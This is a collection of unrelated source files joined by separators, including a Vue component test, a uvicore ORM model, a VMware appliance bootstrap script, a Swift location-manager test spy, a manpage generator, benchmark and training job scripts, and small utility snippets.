expect(participantWrapper.find('.selected').exists()).toBeFalsy()
participantWrapper.find('.participant').trigger('click')
expect(participantWrapper.vm.selected).toBeTruthy()
await participantWrapper.vm.$nextTick()
expect(store.state.selected).toContain('A')
expect(participantWrapper.find('.selected').exists()).toBeTruthy()
participantWrapper.find('.participant').trigger('click')
expect(participantWrapper.vm.selected).toBeFalsy()
await participantWrapper.vm.$nextTick()
expect(store.state.selected.includes('A')).toBeFalsy()
expect(participantWrapper.find('.selected').exists()).toBeFalsy()
})
})
|
<reponame>nbobrov8/laba2.20
.import --csv city.csv city
select max(length(city)) from city; |
CREATE TABLE items (
id INTEGER PRIMARY KEY,
item_name TEXT NOT NULL,
item_description TEXT,
item_price INTEGER NOT NULL,
item_quantity INTEGER NOT NULL
);
INSERT INTO items (item_name, item_description, item_price, item_quantity)
VALUES ('Keyboard', 'Full-size keyboard', 80, 20),
('Monitor', 'Full HD monitor', 305, 8),
('Mouse', 'Wireless mouse', 45, 30),
('Headphones', 'Noise cancelling headphones', 153, 12); |
from __future__ import annotations
from typing import List, Optional, Dict
import uvicore
from app1.database.tables import posts as table
from app1.models.image import Image
from app1.models.attribute import Attribute
from uvicore.support.dumper import dump, dd
from uvicore.orm import Model, ModelMetaclass, Field, BelongsTo, BelongsToMany, HasMany, MorphOne, MorphMany, MorphToMany
<EMAIL>('app1.models.post.Post')
@uvicore.model()
class Post(Model['Post'], metaclass=ModelMetaclass):
#class _PostModel(Model['PostModel'], PostInterface, metaclass=ModelMetaclass):
#class _PostModel(Model['PostModel'], metaclass=ModelMetaclass):
#class PostModel(Model['PostModel'], ModelInterface['PostModel'], metaclass=ModelMetaclass):
#class PostModel(Model['PostModel']):
"""App1 Posts"""
# Database table definition
__tableclass__ = table.Posts
id: Optional[int] = Field('id',
primary=True,
description='Post ID',
sortable=False,
searchable=True,
read_only=True,
properties={
'test': 'hi'
}
)
slug: str = Field('unique_slug',
description='URL Friendly Post Title Slug',
required=True,
# properties={
# 'stuff': 'hi',
# 'stuff2': 'hi2',
# }
)
title: str = Field('title',
description='Post Title',
required=True,
)
body: str = Field('body',
description='Post Body',
)
other: str = Field('other',
description='Post Other',
)
cb: str = Field(None,
callback='cb_results'
)
creator_id: int = Field('creator_id',
description="Post Creator UserID",
required=True,
)
# One-To-Many Inverse (One Post has One Creator)
creator: Optional[User] = Field(None,
description="Post Creator User Model",
#relation=BelongsTo('uvicore.auth.models.user.User', 'id', 'creator_id'),
relation=BelongsTo('uvicore.auth.models.user.User'),
)
owner_id: int = Field('owner_id',
description="Post Owner UserID",
required=True,
)
# One-To-Many Inverse (One Post has One Owner)
owner: Optional[User] = Field(None,
description="Post Owner User Model",
#relation=BelongsTo('uvicore.auth.models.user.User', 'id', 'owner_id'),
relation=BelongsTo('uvicore.auth.models.user.User'),
)
# One-To-Many (One Post has Many Comments)
comments: Optional[List[Comment]] = Field(None,
description="Post Comments Model",
#has_many=('app1.models.comment.Comment', 'post_id', 'id'),
#relation=HasMany('app1.models.comment.Comment', 'post_id', 'id'),
relation=HasMany('app1.models.comment.Comment', foreign_key='post_id'),
#relation=HasMany('app1.models.comment.Comment'),
)
# Many-To-Many via post_tags pivot table
tags: Optional[List[Tag]] = Field(None,
description="Post Tags",
relation=BelongsToMany('app1.models.tag.Tag', join_tablename='post_tags', left_key='post_id', right_key='tag_id'),
)
# Polymorphic One-To-One image
image: Optional[Image] = Field(None,
description="Post Image",
relation=MorphOne('app1.models.image.Image', polyfix='imageable')
)
# Polymorphic One-To-Many Attributes
attributes: Optional[List[Attribute]] = Field(None,
#attributes: Optional[Dict] = Field(None,
description="Post Attributes",
# Must be a dict for unit tests
relation=MorphMany('app1.models.attribute.Attribute', polyfix='attributable', dict_key='key', dict_value='value')
#relation=MorphMany('app1.models.attribute.Attribute', polyfix='attributable')
)
# Polymorphic Many-To-Many Hashtags
hashtags: Optional[List[str]] = Field(None,
description="Post Hashtags",
# relation=MorphToMany(
# model='app1.models.hashtag.Hashtag',
# join_tablename='hashtaggables',
# polyfix='hashtaggable',
# right_key='hashtag_id'
# ),
relation=MorphToMany(
model='app1.models.hashtag.Hashtag',
join_tablename='hashtaggables',
polyfix='hashtaggable',
right_key='hashtag_id',
#dict_key='id',
#dict_value='name',
#list_value='name',
),
)
def cb_results(self):
return str(self.slug) + ' callback'
async def _before_save(self):
await super()._before_save()
#dump('yyyyyyyyyyyyyyyyyyyyyyyyyyyyy')
#if self.other is not None:
#self.other = self.other + ' !!!!!!!!!!!!!!!!!!!'
# @uvicore.events.listen('app1.models.post.PostModel-BeforeSave')
# def _event_inserting(event, payload):
# dump('HANDLER FOR ' + event.get('name'))
# #pass
# #dump("event inserting here")
# #dump(payload.model.extra1)
# #dump(payload)
# if payload.model.other is not None:
# payload.model.other = payload.model.other + ' !!!!!!!!!!!!!'
# # #dump(payload.model.other)
# # pass
# #payload.model.extra1 = 'user5 extra111'
# # #uvicore.events.listen('app1-models-post-PostModel-events-Inserting', _event_inserting)
# @uvicore.events.listen('app1.models.post.PostModel-AfterSave')
# def _event_inserting(event, payload):
# dump('HANDLER FOR ' + event.get('name'))
# IoC Class Instance
#Post: PostModel = uvicore.ioc.make('app1.models.post.Post', PostModel)
#class Post(PostIoc, Model[PostModel], PostInterface): pass
# class Post(
# _Post,
# Model[PostModel],
# PostInterface
# ): pass
# Update forwrad refs (a work around to circular dependencies)
# If the relation has an ID foreign key on this table, use ioc.make
# If not (the reverse relation) use from xyz import abc
#from uvicore.auth.models.user import User # isort:skip
#from app1.models.user import User # isort:skip
from app1.models.comment import Comment # isort:skip
from app1.models.tag import Tag # isort:skip
from app1.models.hashtag import Hashtag # isort:skip
#from uvicore.auth.models.user import User # isort:skip
from app1.models.user import User # isort:skip
#User = uvicore.ioc.make('uvicore.auth.models.user.User')
#Comment = uvicore.ioc.make('app1.models.comment.Comment')
#Tag = uvicore.ioc.make('app1.models.tag.Tag')
Post.update_forward_refs()
#PostModel.update_forward_refs()
|
#!/bin/bash
# Copyright 2019 VMware, Inc. All rights reserved.
# SPDX-License-Identifier: BSD-2
set -euo pipefail
# Extract all OVF Properties
VEBA_DEBUG=$(/root/setup/getOvfProperty.py "guestinfo.debug")
HOSTNAME=$(/root/setup/getOvfProperty.py "guestinfo.hostname")
IP_ADDRESS=$(/root/setup/getOvfProperty.py "guestinfo.ipaddress")
NETMASK=$(/root/setup/getOvfProperty.py "guestinfo.netmask" | awk -F ' ' '{print $1}')
GATEWAY=$(/root/setup/getOvfProperty.py "guestinfo.gateway")
DNS_SERVER=$(/root/setup/getOvfProperty.py "guestinfo.dns")
DNS_DOMAIN=$(/root/setup/getOvfProperty.py "guestinfo.domain")
NTP_SERVER=$(/root/setup/getOvfProperty.py "guestinfo.ntp")
HTTP_PROXY=$(/root/setup/getOvfProperty.py "guestinfo.http_proxy")
HTTPS_PROXY=$(/root/setup/getOvfProperty.py "guestinfo.https_proxy")
PROXY_USERNAME=$(/root/setup/getOvfProperty.py "guestinfo.proxy_username")
PROXY_PASSWORD=$(/root/setup/getOvfProperty.py "guestinfo.proxy_password")
NO_PROXY=$(/root/setup/getOvfProperty.py "guestinfo.no_proxy")
ROOT_PASSWORD=$(/root/setup/getOvfProperty.py "guestinfo.root_password")
ENABLE_SSH=$(/root/setup/getOvfProperty.py "guestinfo.enable_ssh" | tr '[:upper:]' '[:lower:]')
VCENTER_SERVER=$(/root/setup/getOvfProperty.py "guestinfo.vcenter_server")
VCENTER_USERNAME=$(/root/setup/getOvfProperty.py "guestinfo.vcenter_username")
VCENTER_PASSWORD=$(/root/setup/getOvfProperty.py "guestinfo.vcenter_password")
VCENTER_USERNAME_FOR_VEBA_UI=$(/root/setup/getOvfProperty.py "guestinfo.vcenter_veba_ui_username")
VCENTER_PASSWORD_FOR_VEBA_UI=$(/root/setup/getOvfProperty.py "guestinfo.vcenter_veba_ui_password")
VCENTER_DISABLE_TLS=$(/root/setup/getOvfProperty.py "guestinfo.vcenter_disable_tls_verification" | tr '[:upper:]' '[:lower:]')
EVENT_PROCESSOR_TYPE=$(/root/setup/getOvfProperty.py "guestinfo.event_processor_type")
OPENFAAS_PASSWORD=$(/root/setup/getOvfProperty.py "guestinfo.openfaas_password")
OPENFAAS_ADV_OPTION=$(/root/setup/getOvfProperty.py "guestinfo.openfaas_advanced_options")
KNATIVE_HOST=$(/root/setup/getOvfProperty.py "guestinfo.knative_host")
KNATIVE_SCHEME=$(/root/setup/getOvfProperty.py "guestinfo.knative_scheme" | tr [:upper:] [:lower:])
KNATIVE_DISABLE_TLS=$(/root/setup/getOvfProperty.py "guestinfo.knative_disable_tls_verification" | tr '[:upper:]' '[:lower:]')
KNATIVE_PATH=$(/root/setup/getOvfProperty.py "guestinfo.knative_path")
AWS_EVENTBRIDGE_ACCESS_KEY=$(/root/setup/getOvfProperty.py "guestinfo.aws_eb_access_key")
AWS_EVENTBRIDGE_ACCESS_SECRET=$(/root/setup/getOvfProperty.py "guestinfo.aws_eb_access_secret")
AWS_EVENTBRIDGE_EVENT_BUS=$(/root/setup/getOvfProperty.py "guestinfo.aws_eb_event_bus")
AWS_EVENTBRIDGE_REGION=$(/root/setup/getOvfProperty.py "guestinfo.aws_eb_region")
AWS_EVENTBRIDGE_RULE_ARN=$(/root/setup/getOvfProperty.py "guestinfo.aws_eb_arn")
AWS_EVENTBRIDGE_ADV_OPTION=$(/root/setup/getOvfProperty.py "guestinfo.aws_eb_advanced_options")
CUSTOM_VEBA_TLS_PRIVATE_KEY=$(/root/setup/getOvfProperty.py "guestinfo.custom_tls_private_key")
CUSTOM_VEBA_TLS_CA_CERT=$(/root/setup/getOvfProperty.py "guestinfo.custom_tls_ca_cert")
DOCKER_NETWORK_CIDR=$(/root/setup/getOvfProperty.py "guestinfo.docker_network_cidr")
POD_NETWORK_CIDR=$(/root/setup/getOvfProperty.py "guestinfo.pod_network_cidr")
LOCAL_STORAGE_DISK="/dev/sdb"
LOCAL_STOARGE_VOLUME_PATH="/data"
export KUBECONFIG="/root/.kube/config"
if [ -e /root/ran_customization ]; then
exit
else
VEBA_LOG_FILE=/var/log/bootstrap.log
if [ ${VEBA_DEBUG} == "True" ]; then
VEBA_LOG_FILE=/var/log/bootstrap-debug.log
set -x
exec 2>> ${VEBA_LOG_FILE}
echo
echo "### WARNING -- DEBUG LOG CONTAINS ALL EXECUTED COMMANDS WHICH INCLUDES CREDENTIALS -- WARNING ###"
echo "### WARNING -- PLEASE REMOVE CREDENTIALS BEFORE SHARING LOG -- WARNING ###"
echo
fi
# Determine Knative deployment model
if [ "${EVENT_PROCESSOR_TYPE}" == "Knative" ]; then
if [ ! -z ${KNATIVE_HOST} ]; then
KNATIVE_DEPLOYMENT_TYPE="external"
else
KNATIVE_DEPLOYMENT_TYPE="embedded"
fi
else
KNATIVE_DEPLOYMENT_TYPE="na"
fi
echo -e "\e[92mStarting Customization ..." > /dev/console
echo -e "\e[92mStarting OS Configuration ..." > /dev/console
. /root/setup/setup-01-os.sh
echo -e "\e[92mStarting Network Proxy Configuration ..." > /dev/console
. /root/setup/setup-02-proxy.sh
echo -e "\e[92mStarting Network Configuration ..." > /dev/console
. /root/setup/setup-03-network.sh
echo -e "\e[92mStarting Kubernetes Configuration ..." > /dev/console
. /root/setup/setup-04-kubernetes.sh
if [ "${KNATIVE_DEPLOYMENT_TYPE}" == "embedded" ]; then
echo -e "\e[92mStarting Knative Configuration ..." > /dev/console
. /root/setup/setup-05-knative.sh
fi
echo -e "\e[92mStarting VMware Event Processor Configuration ..." > /dev/console
. /root/setup/setup-06-event-processor.sh
echo -e "\e[92mStarting VMware Event Router Configuration ..." > /dev/console
. /root/setup/setup-07-event-router.sh
echo -e "\e[92mStarting TinyWWW Configuration ..." > /dev/console
. /root/setup/setup-08-tinywww.sh
echo -e "\e[92mStarting Ingress Router Configuration ..." > /dev/console
. /root/setup/setup-09-ingress.sh
if [[ "${KNATIVE_DEPLOYMENT_TYPE}" == "embedded" ]] && [[ ! -z ${VCENTER_USERNAME_FOR_VEBA_UI} ]] && [[ ! -z ${VCENTER_PASSWORD_FOR_VEBA_UI} ]]; then
echo -e "\e[92mStarting Knative UI Configuration ..." > /dev/console
. /root/setup/setup-010-veba-ui.sh
fi
echo -e "\e[92mStarting OS Banner Configuration ..."> /dev/console
. /root/setup/setup-011-banner.sh &
echo -e "\e[92mCustomization Completed ..." > /dev/console
# Clear guestinfo.ovfEnv
vmtoolsd --cmd "info-set guestinfo.ovfEnv NULL"
# Ensure we don't run customization again
touch /root/ran_customization
fi |
def km_to_miles(km_h):
return km_h * 0.621371
if __name__ == "__main__":
print(km_to_miles(25)) |
<reponame>Uvacoder/sorted-colors<gh_stars>100-1000
const test = require('tape')
const loadDOM = require('../../test-helpers/load-dom')
const exampleTableMarkup = `
<table>
<thead>
<tr>
<th id="name">Name</th>
<th id="country">Country</th>
</tr>
</thead>
<tbody>
<tr class="north">
<td>Siberia</td>
<td>Russia</td>
</tr>
<tr class="south">
<td>Patagonia</td>
<td>Argentina / Chile</td>
</tr>
<tr class="equatorial">
<td>Amazon</td>
<td>Brazil</td>
</tr>
</tbody>
</table>
`
test('Table.parseDataFromTable', async t => {
const dom = await loadDOM()
const { Table } = dom.window.modules
const container = dom.window.document.createElement('div')
container.innerHTML = exampleTableMarkup
const exampleTable = container.firstElementChild
const actual = Table.parseDataFromTable(exampleTable)
const expected = {
columns: [
{ id: 'name', name: 'Name' },
{ id: 'country', name: 'Country' }
],
rows: [
{
type: 'north',
name: 'Siberia',
country: 'Russia'
},
{
type: 'south',
name: 'Patagonia',
country: 'Argentina / Chile'
},
{
type: 'equatorial',
name: 'Amazon',
country: 'Brazil'
}
]
}
t.deepLooseEqual(actual, expected, 'Parsed correctly')
})
|
python -m torch.distributed.launch --nnodes=1 --nproc_per_node=8 --node_rank=0 transformers/examples/pytorch/summarization/run_summarization.py \
--model_name_or_path "facebook/mbart-large-50" \
--do_eval \
--do_train \
--do_predict \
--dataset_name mlsum \
--dataset_config "tu" \
--output_dir ./eval-tr-bart-large/ \
--per_device_train_batch_size 2 \
--per_device_eval_batch_size 4 \
--gradient_accumulation_steps 4 \
--predict_with_generate \
--evaluation_strategy epoch \
--save_strategy epoch \
--num_beams 4 \
--source_lang tr_TR \
--target_lang tr_TR \
--forced_bos_token tr_TR \
--max_target_length 64 \
--max_source_length 496 \
--num_train_epochs 10 \
--load_best_model_at_end \
--metric_for_best_model eval_rougeL \
--learning_rate 5e-05 \
--group_by_length \
--report_to tensorboard \
--label_smoothing_factor 0.1 \
--fp16
python -m torch.distributed.launch --nnodes=1 --nproc_per_node=8 --node_rank=0 transformers/examples/pytorch/summarization/run_summarization.py \
--model_name_or_path "google/mt5-base" \
--do_eval \
--do_train \
--do_predict \
--dataset_name mlsum \
--dataset_config "tu" \
--output_dir ./eval-mt5-base-aggressive/ \
--per_device_train_batch_size 2 \
--per_device_eval_batch_size 4 \
--gradient_accumulation_steps 4 \
--predict_with_generate \
--evaluation_strategy epoch \
--save_strategy epoch \
--num_beams 4 \
--max_target_length 64 \
--max_source_length 496 \
--num_train_epochs 10 \
--learning_rate 5e-04 \
--load_best_model_at_end \
--metric_for_best_model eval_rougeL \
--group_by_length \
--report_to tensorboard \
--source_prefix "summarize: " \
--label_smoothing_factor 0.1
python -m torch.distributed.launch --nnodes=1 --nproc_per_node=8 --node_rank=0 transformers/examples/pytorch/summarization/run_summarization.py \
--model_name_or_path "./turkish-bart-uncased" \
--do_eval \
--do_train \
--do_predict \
--dataset_name mlsum \
--dataset_config "tu" \
--output_dir ./eval-turkish-bart-uncased/ \
--per_device_train_batch_size 4 \
--per_device_eval_batch_size 8 \
--gradient_accumulation_steps 2 \
--predict_with_generate \
--evaluation_strategy epoch \
--save_strategy epoch \
--num_beams 4 \
--max_target_length 64 \
--max_source_length 768 \
--num_train_epochs 15 \
--learning_rate 1e-4 \
--load_best_model_at_end \
--metric_for_best_model eval_rougeL \
--group_by_length \
--report_to tensorboard \
--label_smoothing_factor 0.1 \
--fp16
|
#include <vector>
#include <string>
#include <numeric>
#include <iostream>
#include "processor.h"
#include "linux_parser.h"
using std::string;
using std::vector;
// DONE: Return the aggregate CPU utilization
float Processor::Utilization() {
vector<string> utilizationStrings = LinuxParser::CpuUtilization();
vector<int> cpuTimes;
std::transform(utilizationStrings.begin(), utilizationStrings.end(),
std::back_inserter(cpuTimes),
[](const std::string& str) { return std::stoi(str); });
const int idle = cpuTimes[3];
const int total = std::accumulate(cpuTimes.begin(), cpuTimes.end(), 0);
auto idle_delta = (float) (idle - previous_idle);
auto total_delta = (float) (total - previous_total);
this->previous_idle = idle;
this->previous_total = total;
return 1 - idle_delta / total_delta;
}
|
#!/usr/bin/env vbash
# Copyright (c) 2016 Paul Jolly <paul@myitcv.org.uk>, all rights reserved.
# Use of this document is governed by a license found in the LICENSE document.
source "$(git rev-parse --show-toplevel)/_scripts/common.bash"
# TODO: work out a better way of priming the build tools
go install myitcv.io/cmd/concsh myitcv.io/cmd/pkgconcat
go install golang.org/x/tools/cmd/goimports
# Top-level run_tests.sh only.
# check we don't have doubly-nested sub tests - we don't support this yet
diff -wu <(nested_test_dirs) <(nested_test_dirs | grep -v -f <(nested_test_dir_patterns))
# TODO for now we manually specify the run order of nested test dirs
# that is until we automate the dependency order (or use Bazel??)
nested_order="sorter
immutable
cmd/gjbt
react
gopherize.me"
# TODO remove when we revert back to running tests in parallel
diff -wu <(cat <<< "$nested_order" | sort) <(nested_test_dirs | sort)
for i in $nested_order
do
echo "=============================" #!
echo "$i/_scripts/run_tests.sh" #!
pushd $i > /dev/null
./_scripts/run_tests.sh
popd > /dev/null
done
# TODO come up with a better way of doing mutli-OS-ARCH stuff
GOOS=linux GOARCH=amd64 gobin -m -run myitcv.io/cmd/gg myitcv.io/cmd/protoc
GOOS=darwin GOARCH=amd64 gobin -m -run myitcv.io/cmd/gg myitcv.io/cmd/protoc
for i in $(find -name go.mod -execdir pwd \;)
do
echo "=============================" #!
echo "$i: regular run" #!
pushd $i > /dev/null
gobin -m -run myitcv.io/cmd/gg $(subpackages)
ensure_go_formatted $(sub_git_files | non_gen_go_files)
ensure_go_gen_formatted $(sub_git_files | gen_go_files)
go test $(subpackages)
install_main_go $(subpackages | grep -v myitcv.io/cmd/gg/internal/go)
go vet $(subpackages)
go mod tidy
# TODO: remove once we drop Go 1.11 support
go list all > /dev/null
popd > /dev/null
done
./_scripts/update_readmes.sh
if [ $(running_on_ci_server) == "yes" ]
then
verifyGoGet myitcv.io/cmd/concsh
fi
|
/// Spy method that replaces the true implementation of `requestWhenInUseAuthorization`
class LocationManagerSpy: CLLocationManager {
static var originalRequestWhenInUseAuthorization: (() -> Void)?
override class func load() {
swizzleRequestWhenInUseAuthorization()
}
private class func swizzleRequestWhenInUseAuthorization() {
let originalSelector = #selector(CLLocationManager.requestWhenInUseAuthorization)
let swizzledSelector = #selector(LocationManagerSpy.spyRequestWhenInUseAuthorization)
guard let originalMethod = class_getInstanceMethod(CLLocationManager.self, originalSelector),
let swizzledMethod = class_getInstanceMethod(LocationManagerSpy.self, swizzledSelector) else {
return
}
let didAddMethod = class_addMethod(CLLocationManager.self, originalSelector, method_getImplementation(swizzledMethod), method_getTypeEncoding(swizzledMethod))
if didAddMethod {
class_replaceMethod(CLLocationManager.self, swizzledSelector, method_getImplementation(originalMethod), method_getTypeEncoding(originalMethod))
} else {
method_exchangeImplementations(originalMethod, swizzledMethod)
}
}
@objc private dynamic func spyRequestWhenInUseAuthorization() {
if LocationManagerSpy.forwardsInvocations {
LocationManagerSpy.originalRequestWhenInUseAuthorization?()
} else {
// Custom behavior for intercepting the true implementation
print("Intercepted requestWhenInUseAuthorization")
// Add custom behavior here
}
}
} |
/**
*
*/
package jframe.core.plugin;
import jframe.core.msg.Msg;
import jframe.core.msg.PluginMsg;
import jframe.core.plugin.annotation.Message;
import jframe.core.plugin.annotation.MsgInterest;
import jframe.core.plugin.annotation.MsgRecv;
/**
* @author dzh
* @date Oct 14, 2013 7:53:25 AM
* @since 1.0
*/
@Message(isRecver = true)
public abstract class PluginRecver extends DefPlugin {
public PluginRecver() {
super();
}
/*
* (non-Javadoc)
*
* @see jframe.core.dispatch.DispatchTarget#receive(jframe.core.msg.Msg)
*/
@MsgRecv
public void receive(Msg<?> msg) {
doRecvMsg(msg);
}
/**
* @param msg
*/
abstract protected void doRecvMsg(Msg<?> msg);
/**
* message's meta information
*/
public static final String MSG_PLUGIN_ID = "PluginId";
/*
* (non-Javadoc)
*
* @see jframe.core.dispatch.DispatchTarget#interestMsg(jframe.core.msg.Msg)
*/
@MsgInterest
public boolean interestMsg(Msg<?> msg) {
// don't receive itself
if (msg == null || PluginStatus.STOP == getStatus() || getName().equals(msg.getMeta(PluginMsg.PluginName)))
return false;
return canRecvMsg(msg);
}
/**
* @param msg
* @return
*/
abstract protected boolean canRecvMsg(Msg<?> msg);
}
|
# building the graph
java -Xmx8G -jar otp.jar --build /path/to/dir --basePath /home/ja/Dropbox/work/canada_access/a_mon --analyst
# for localhosting and testing
java -Xmx8G -jar otp.jar --build /path/to/dir --inMemory --analyst
# running a jython command
jython -J-Xmx8g -Dpython.path=otp.jar t1.py
# setting up a graph folder
mkdir graphs
cd graphs
mkdir g
cd ..
mv Graph.obj graphs/g/
|
import ModuleAccessPolicy from '../../../shared/modules/AccessPolicy/ModuleAccessPolicy';
import ModuleDAO from '../../../shared/modules/DAO/ModuleDAO';
import MaintenanceVO from '../../../shared/modules/Maintenance/vos/MaintenanceVO';
import PostModulesPoliciesPatchBase from '../PostModulesPoliciesPatchBase';
export default class Patch20201218AddMaintenanceCreationPolicy extends PostModulesPoliciesPatchBase {
public static getInstance(): Patch20201218AddMaintenanceCreationPolicy {
if (!Patch20201218AddMaintenanceCreationPolicy.instance) {
Patch20201218AddMaintenanceCreationPolicy.instance = new Patch20201218AddMaintenanceCreationPolicy();
}
return Patch20201218AddMaintenanceCreationPolicy.instance;
}
private static instance: Patch20201218AddMaintenanceCreationPolicy = null;
private constructor() {
super('Patch20201218AddMaintenanceCreationPolicy');
}
protected async do_policies_activations(
roles_ids_by_name: { [role_name: string]: number },
policies_ids_by_name: { [policy_name: string]: number }) {
await this.activate_policies(
policies_ids_by_name[ModuleDAO.getInstance().getAccessPolicyName(ModuleDAO.DAO_ACCESS_TYPE_INSERT_OR_UPDATE, MaintenanceVO.API_TYPE_ID)],
[
roles_ids_by_name[ModuleAccessPolicy.ROLE_ANONYMOUS],
]);
}
} |
#!/bin/sh
TOPDIR=${TOPDIR:-$(git rev-parse --show-toplevel)}
SRCDIR=${SRCDIR:-$TOPDIR/src}
MANDIR=${MANDIR:-$TOPDIR/doc/man}
BITCOIND=${BITCOIND:-$SRCDIR/wolfcoind}
BITCOINCLI=${BITCOINCLI:-$SRCDIR/wolfcoin-cli}
BITCOINTX=${BITCOINTX:-$SRCDIR/wolfcoin-tx}
BITCOINQT=${BITCOINQT:-$SRCDIR/qt/wolfcoin-qt}
[ ! -x $BITCOIND ] && echo "$BITCOIND not found or not executable." && exit 1
# The autodetected version git tag can screw up manpage output a little bit
BTCVER=($($BITCOINCLI --version | head -n1 | awk -F'[ -]' '{ print $6, $7 }'))
# Create a footer file with copyright content.
# This gets autodetected fine for bitcoind if --version-string is not set,
# but has different outcomes for bitcoin-qt and bitcoin-cli.
echo "[COPYRIGHT]" > footer.h2m
$BITCOIND --version | sed -n '1!p' >> footer.h2m
for cmd in $BITCOIND $BITCOINCLI $BITCOINTX $BITCOINQT; do
cmdname="${cmd##*/}"
help2man -N --version-string=${BTCVER[0]} --include=footer.h2m -o ${MANDIR}/${cmdname}.1 ${cmd}
sed -i "s/\\\-${BTCVER[1]}//g" ${MANDIR}/${cmdname}.1
done
rm -f footer.h2m
|
#!/usr/bin/env bash
echo "./Erlay -n 1000 -d 10 -s 0 -u 100000 -e ../test-sets/diff_estimates_with_tow_10_128_9012.txt -r 1.38"
./Erlay -n 1000 -d 10 -s 0 -u 100000 -e ../test-sets/diff_estimates_with_tow_10_128_9012.txt -r 1.38
echo "./Erlay -n 1000 -d 20 -s 10 -u 100000 -e ../test-sets/diff_estimates_with_tow_20_128_9012.txt -r 1.38"
./Erlay -n 1000 -d 20 -s 10 -u 100000 -e ../test-sets/diff_estimates_with_tow_20_128_9012.txt -r 1.38
echo "./Erlay -n 1000 -d 30 -s 30 -u 100000 -e ../test-sets/diff_estimates_with_tow_30_128_9012.txt -r 1.38"
./Erlay -n 1000 -d 30 -s 30 -u 100000 -e ../test-sets/diff_estimates_with_tow_30_128_9012.txt -r 1.38
echo "./Erlay -n 1000 -d 60 -s 60 -u 100000 -e ../test-sets/diff_estimates_with_tow_60_128_9012.txt -r 1.38"
./Erlay -n 1000 -d 60 -s 60 -u 100000 -e ../test-sets/diff_estimates_with_tow_60_128_9012.txt -r 1.38
echo "./Erlay -n 1000 -d 100 -s 120 -u 100000 -e ../test-sets/diff_estimates_with_tow_100_128_9012.txt -r 1.38"
./Erlay -n 1000 -d 100 -s 120 -u 100000 -e ../test-sets/diff_estimates_with_tow_100_128_9012.txt -r 1.38
echo "./Erlay -n 1000 -d 200 -s 220 -u 100000 -e ../test-sets/diff_estimates_with_tow_200_128_9012.txt -r 1.38"
./Erlay -n 1000 -d 200 -s 220 -u 100000 -e ../test-sets/diff_estimates_with_tow_200_128_9012.txt -r 1.38
echo "./Erlay -n 1000 -d 400 -s 420 -u 100000 -e ../test-sets/diff_estimates_with_tow_400_128_9012.txt -r 1.38"
./Erlay -n 1000 -d 400 -s 420 -u 100000 -e ../test-sets/diff_estimates_with_tow_400_128_9012.txt -r 1.38
echo "./Erlay -n 1000 -d 700 -s 820 -u 100000 -e ../test-sets/diff_estimates_with_tow_700_128_9012.txt -r 1.38"
./Erlay -n 1000 -d 700 -s 820 -u 100000 -e ../test-sets/diff_estimates_with_tow_700_128_9012.txt -r 1.38
echo "./Erlay -n 1000 -d 1000 -s 1520 -u 100000 -e ../test-sets/diff_estimates_with_tow_1000_128_9012.txt -r 1.38"
./Erlay -n 1000 -d 1000 -s 1520 -u 100000 -e ../test-sets/diff_estimates_with_tow_1000_128_9012.txt -r 1.38
echo "./Erlay -n 1000 -d 1400 -s 2520 -u 100000 -e ../test-sets/diff_estimates_with_tow_1400_128_9012.txt -r 1.38"
./Erlay -n 1000 -d 1400 -s 2520 -u 100000 -e ../test-sets/diff_estimates_with_tow_1400_128_9012.txt -r 1.38
echo "./Erlay -n 1000 -d 2500 -s 3920 -u 100000 -e ../test-sets/diff_estimates_with_tow_2500_128_9012.txt -r 1.38"
./Erlay -n 1000 -d 2500 -s 3920 -u 100000 -e ../test-sets/diff_estimates_with_tow_2500_128_9012.txt -r 1.38
echo "./Erlay -n 1000 -d 4000 -s 6420 -u 100000 -e ../test-sets/diff_estimates_with_tow_4000_128_9012.txt -r 1.38"
./Erlay -n 1000 -d 4000 -s 6420 -u 100000 -e ../test-sets/diff_estimates_with_tow_4000_128_9012.txt -r 1.38
echo "./Erlay -n 1000 -d 8000 -s 10420 -u 100000 -e ../test-sets/diff_estimates_with_tow_8000_128_9012.txt -r 1.38"
./Erlay -n 1000 -d 8000 -s 10420 -u 100000 -e ../test-sets/diff_estimates_with_tow_8000_128_9012.txt -r 1.38
echo "./Erlay -n 1000 -d 10000 -s 18420 -u 100000 -e ../test-sets/diff_estimates_with_tow_10000_128_9012.txt -r 1.38"
./Erlay -n 1000 -d 10000 -s 18420 -u 100000 -e ../test-sets/diff_estimates_with_tow_10000_128_9012.txt -r 1.38
|
require('es6-promise').polyfill();
require('isomorphic-fetch');
var Application = require('./lib/core/application'),
Routes = require('./routes.jsx'),
TasksService = require('./services/tasks'),
HackerNewsService = require('./services/hackernews'),
PackageSuggestionsService = require('./services/package-suggestions'),
TaskStore = require('./stores/tasks'),
HackerNewsStore = require('./stores/hackernews'),
PackageSuggestionsStore = require('./stores/package-suggestions'),
createTaskAction = require('./actions/tasks/create'),
removeTaskAction = require('./actions/tasks/remove'),
updateTaskAction = require('./actions/tasks/update'),
showTasksAction = require('./actions/tasks/show'),
filterTasksAction = require('./actions/tasks/filter'),
searchHackerNewsAction = require('./actions/hackernews/search'),
searchHotelUrbanoAction = require('./actions/hotel-urbano/search');
module.exports = function() {
//This will be de app instance, available everywhere
var app = new Application();
//Setting the routes
app.setRoutes(Routes(app));
//Adding the app services
app.addService(TasksService(app));
app.addService(HackerNewsService(app));
app.addService(PackageSuggestionsService(app));
//Adding the app stores
app.addStore(new TaskStore());
app.addStore(new HackerNewsStore());
app.addStore(new PackageSuggestionsStore());
//Adding the app actions
app.addAction(createTaskAction);
app.addAction(removeTaskAction);
app.addAction(updateTaskAction);
app.addAction(showTasksAction);
app.addAction(filterTasksAction);
app.addAction(searchHackerNewsAction);
app.addAction(searchHotelUrbanoAction);
return app;
}; |
#!/bin/bash
#SBATCH --account=def-dkulic
#SBATCH --mem=8000M # memory per node
#SBATCH --time=23:00:00 # time (DD-HH:MM)
#SBATCH --output=/project/6001934/lingheng/Double_DDPG_Job_output/continuous_RoboschoolInvertedDoublePendulum-v1_doule_ddpg_hardcopy_action_noise_seed1_run6_%N-%j.out # %N for node name, %j for jobID
module load qt/5.9.6 python/3.6.3 nixpkgs/16.09 gcc/7.3.0 boost/1.68.0 cuda cudnn
source ~/tf_cpu/bin/activate
python ./ddpg_discrete_action.py --env RoboschoolInvertedDoublePendulum-v1 --random-seed 1 --exploration-strategy action_noise --summary-dir ../Double_DDPG_Results_no_monitor/continuous/RoboschoolInvertedDoublePendulum-v1/doule_ddpg_hardcopy_action_noise_seed1_run6 --continuous-act-space-flag --target-hard-copy-flag
|
// Copyright (c) 2021 MC-Market (Mick Capital Pty. Ltd.)
